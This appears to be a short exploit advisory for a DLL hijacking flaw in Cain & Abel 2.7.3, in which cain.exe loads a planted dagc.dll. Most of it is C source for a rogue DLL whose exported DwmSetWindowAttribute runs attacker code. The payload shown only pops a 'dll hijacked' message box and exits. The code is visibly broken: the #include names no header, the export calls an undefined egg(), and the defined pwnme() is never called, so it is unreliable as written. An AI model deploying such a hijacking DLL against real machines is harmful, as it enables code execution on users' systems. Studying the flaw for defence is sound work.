############################################# Cain & Able dll hijacking vulnerability software : cain - http://oxid.it version : 2.7.3 author : d3c0der - d3c0der@hotmail.com website : www.attackerz.ir ############################################ file : cain.exe Vulnerable dll : dagc.dll ############################################# #include #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int pwnme() { MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); exit(0); return 0; } ##############################################